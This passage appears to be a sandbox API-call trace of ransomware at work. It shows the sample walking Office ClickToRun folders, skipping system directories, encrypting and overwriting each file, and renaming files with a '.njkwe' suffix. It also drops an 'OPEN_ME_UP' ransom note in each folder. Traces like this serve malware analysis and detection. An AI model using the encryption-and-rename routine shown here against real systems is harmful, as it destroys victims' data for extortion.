0xbe0000 [0067.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0067.521] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a5650a, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a5650a, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x3e87ff00, ftLastWriteTime.dwHighDateTime=0x1d0d7ef, nFileSizeHigh=0x0, nFileSizeLow=0xd77c4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x64.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0067.521] FindClose (in: hFindFile=0xc19c60 | out: hFindFile=0xc19c60) returned 1 [0067.521] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0067.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\en-us.16\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\en-us.16\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0067.522] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0067.523] CloseHandle (hObject=0x434) returned 1 [0067.523] GetProcessHeap () returned 0xbe0000 [0067.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0067.523] FindNextFileW (in: hFindFile=0xc1a3e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe68ff039, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a5650a, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xe6a5650a, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="x-none.16", cAlternateFileName="")) returned 1 [0067.523] lstrcmpiW (lpString1="x-none.16", lpString2="Windows") returned 1 [0067.523] lstrcmpiW (lpString1="x-none.16", lpString2="$Recycle.bin") returned 1 [0067.523] lstrcmpiW (lpString1="x-none.16", lpString2="System Volume Information") returned 1 [0067.523] lstrcmpiW (lpString1="x-none.16", lpString2="Program Files") returned 1 [0067.523] lstrcmpiW (lpString1="x-none.16", lpString2="Program Files (x86)") returned 1 [0067.523] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16") returned 86 [0067.523] lstrcmpW (lpString1="x-none.16", lpString2=".") returned 1 [0067.523] lstrcmpW (lpString1="x-none.16", lpString2="..") returned 1 [0067.523] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.523] GetProcessHeap () returned 0xbe0000 [0067.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0067.523] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\*") returned 88 [0067.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe68ff039, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a5650a, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xe6a5650a, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a0e0 [0067.525] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.525] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.525] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.525] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.525] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.525] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\.") returned 88 [0067.525] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.525] FindNextFileW (in: hFindFile=0xc1a0e0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe68ff039, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a5650a, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xe6a5650a, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.525] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.525] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.526] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.526] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.526] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.526] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\..") returned 89 [0067.526] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.526] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.526] FindNextFileW (in: hFindFile=0xc1a0e0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a09ff9, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a09ff9, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x37142600, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x5211, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDescriptor.x-none.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0067.526] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="Windows") returned -1 [0067.526] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="$Recycle.bin") returned 1 [0067.526] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="System Volume Information") returned -1 [0067.526] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="Program Files") returned -1 [0067.526] lstrcmpiW (lpString1="MasterDescriptor.x-none.xml", lpString2="Program Files (x86)") returned -1 [0067.526] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\MasterDescriptor.x-none.xml") returned 114 [0067.526] StrStrIW (lpFirst="MasterDescriptor.x-none.xml", lpSrch=".njkwe") returned 0x0 [0067.526] lstrcmpW (lpString1="MasterDescriptor.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.526] lstrcmpW (lpString1="MasterDescriptor.x-none.xml", lpString2="taridd") returned -1 [0067.526] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\MasterDescriptor.x-n", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.526] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0067.526] GetTickCount () returned 0x115145f [0067.526] GetTickCount () returned 0x115145f [0067.526] GetTickCount () returned 0x115145f [0067.526] GetTickCount () returned 0x115145f [0067.526] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0067.527] GetProcessHeap () returned 0xbe0000 [0067.527] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0067.527] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.528] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.528] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.529] GetProcessHeap () returned 0xbe0000 [0067.529] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0067.529] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.529] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0067.529] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0067.529] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0067.529] CloseHandle (hObject=0x438) returned 1 [0067.529] GetProcessHeap () returned 0xbe0000 [0067.529] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0067.529] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\MasterDescriptor.x-none.xml_r00t_{3sXlE5}.njkwe") returned 134 [0067.530] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\x-none.16\\masterdescriptor.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\MasterDescriptor.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\x-none.16\\masterdescriptor.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0067.530] GetProcessHeap () returned 0xbe0000 [0067.530] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0067.530] FindNextFileW (in: hFindFile=0xc1a0e0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a302bd, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a302bd, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x6035b600, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="s640.hash", cAlternateFileName="S640~1.HAS")) returned 1 [0067.530] lstrcmpiW (lpString1="s640.hash", lpString2="Windows") returned -1 [0067.530] lstrcmpiW (lpString1="s640.hash", lpString2="$Recycle.bin") returned 1 [0067.530] lstrcmpiW (lpString1="s640.hash", lpString2="System Volume Information") returned -1 [0067.530] lstrcmpiW (lpString1="s640.hash", lpString2="Program Files") returned 1 [0067.530] lstrcmpiW (lpString1="s640.hash", lpString2="Program Files (x86)") returned 1 [0067.530] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\s640.hash") returned 96 [0067.530] StrStrIW (lpFirst="s640.hash", lpSrch=".njkwe") returned 0x0 [0067.530] lstrcmpW (lpString1="s640.hash", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.530] lstrcmpW (lpString1="s640.hash", lpString2="taridd") returned -1 [0067.530] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\s640.hash", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.530] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\x-none.16\\s640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0067.531] GetTickCount () returned 0x115145f [0067.531] GetTickCount () returned 0x115145f [0067.531] GetTickCount () returned 0x115145f [0067.531] GetTickCount () returned 0x115145f [0067.531] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0067.531] GetProcessHeap () returned 0xbe0000 [0067.531] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0067.531] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x66, lpOverlapped=0x0) returned 1 [0067.532] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffff9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.532] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x66, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x66, lpOverlapped=0x0) returned 1 [0067.533] GetProcessHeap () returned 0xbe0000 [0067.533] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0067.533] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.533] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0067.533] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0067.533] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0067.534] CloseHandle (hObject=0x438) returned 1 [0067.534] GetProcessHeap () returned 0xbe0000 [0067.534] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0067.534] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\s640.hash_r00t_{3sXlE5}.njkwe") returned 116 [0067.534] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\x-none.16\\s640.hash"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\s640.hash_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\x-none.16\\s640.hash_r00t_{3sxle5}.njkwe")) returned 1 [0067.534] GetProcessHeap () returned 0xbe0000 [0067.534] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0067.534] FindNextFileW (in: hFindFile=0xc1a0e0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a302bd, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a302bd, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x6035b600, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x38480a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x64.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0067.534] lstrcmpiW (lpString1="stream.x64.x-none.man.dat", lpString2="Windows") returned -1 [0067.534] lstrcmpiW (lpString1="stream.x64.x-none.man.dat", lpString2="$Recycle.bin") returned 1 [0067.534] lstrcmpiW (lpString1="stream.x64.x-none.man.dat", lpString2="System Volume Information") returned -1 [0067.534] lstrcmpiW (lpString1="stream.x64.x-none.man.dat", lpString2="Program Files") returned 1 [0067.534] lstrcmpiW (lpString1="stream.x64.x-none.man.dat", lpString2="Program Files (x86)") returned 1 [0067.534] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\stream.x64.x-none.man.dat") returned 112 [0067.534] StrStrIW (lpFirst="stream.x64.x-none.man.dat", lpSrch=".njkwe") returned 0x0 [0067.534] lstrcmpW (lpString1="stream.x64.x-none.man.dat", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0067.534] lstrcmpW (lpString1="stream.x64.x-none.man.dat", lpString2="taridd") returned -1 [0067.534] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\stream.x64.x-none.ma", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0067.535] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\x-none.16\\stream.x64.x-none.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0067.535] GetTickCount () returned 0x115145f [0067.535] GetTickCount () returned 0x115145f [0067.535] GetTickCount () returned 0x115145f [0067.535] GetTickCount () returned 0x115145f [0067.535] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0067.535] GetProcessHeap () returned 0xbe0000 [0067.535] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc49830 [0067.535] ReadFile (in: hFile=0x438, lpBuffer=0xc49830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesRead=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.537] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.537] WriteFile (in: hFile=0x438, lpBuffer=0xc49830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc49830*, lpNumberOfBytesWritten=0x380f04c*=0x2800, lpOverlapped=0x0) returned 1 [0067.537] GetProcessHeap () returned 0xbe0000 [0067.537] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc49830 | out: hHeap=0xbe0000) returned 1 [0067.537] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.537] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0067.539] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0067.539] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0067.539] CloseHandle (hObject=0x438) returned 1 [0067.539] GetProcessHeap () returned 0xbe0000 [0067.540] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc486f0 [0067.540] wnsprintfW (in: pszDest=0xc486f0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\stream.x64.x-none.man.dat_r00t_{3sXlE5}.njkwe") returned 132 [0067.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\x-none.16\\stream.x64.x-none.man.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\stream.x64.x-none.man.dat_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\x-none.16\\stream.x64.x-none.man.dat_r00t_{3sxle5}.njkwe")) returned 1 [0067.540] GetProcessHeap () returned 0xbe0000 [0067.540] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc486f0 | out: hHeap=0xbe0000) returned 1 [0067.540] FindNextFileW (in: hFindFile=0xc1a0e0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6a302bd, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xe6a302bd, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x6035b600, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x38480a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x64.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0067.540] FindClose (in: hFindFile=0xc1a0e0 | out: hFindFile=0xc1a0e0) returned 1 [0067.540] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 118 [0067.540] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\0D0D4EEB-DC03-4B3F-88DF-959FE1EDE5F4\\x-none.16\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\0d0d4eeb-dc03-4b3f-88df-959fe1ede5f4\\x-none.16\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0067.540] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, 